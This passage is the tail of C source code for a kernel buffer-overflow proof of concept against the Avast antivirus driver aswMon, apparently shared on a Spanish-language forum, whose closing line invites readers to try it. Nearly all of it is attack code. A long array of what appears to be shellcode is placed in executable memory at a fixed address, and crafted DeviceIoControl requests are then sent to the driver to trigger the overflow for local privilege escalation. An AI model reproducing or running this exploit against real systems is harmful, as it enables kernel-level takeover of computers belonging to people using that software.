    0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3,
    0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b,
    0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27,
    0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12,
    0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a,
    0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399,
    0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2,
    0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013,
    0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4,
    0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb,
    0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66,
    0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784,
    0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a,
    0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923,
    0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34,
    0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653,
    0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c,
    0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d,
    0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92,
    0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18,
    0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d,
    0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab,
    0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c,
    0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9,
    0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c,
    0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce,
    0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43,
    0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b,
    0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5,
    0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345,
    0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1,
    0xe8f62f56, 0x58f7969a
  };

  DWORD ShellcodeToExecute;

  int choix;
  memset(welcome, 0x61, 100);
  welcome[100] = 0;

  ZeroMemory(out,sizeof(out));

  printf("Avast Kernel Buffer Overflow VulnerabilitynProof Of Concept...nn");
  getch();

  MajShellcode("LocalEscalation_Avast.exe");
  MajRealShellcode();
  MajRealStack();

  ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

  memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
  memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));

  printf("Connecting... ");

  hDevice = CreateFile(".aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  while(hDevice == (HANDLE) 0xffffffff){
    hDevice = CreateFile(".aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    Sleep(1000);
  }
  printf("Found !nHandle : %pn",hDevice);

  DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
  DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
  AfficherListeFichiers();
  printf("Written.n");

  CloseHandle(hDevice);
  getch();
  return 0;
}

 

Si lo probais ya me comentareis respuestas.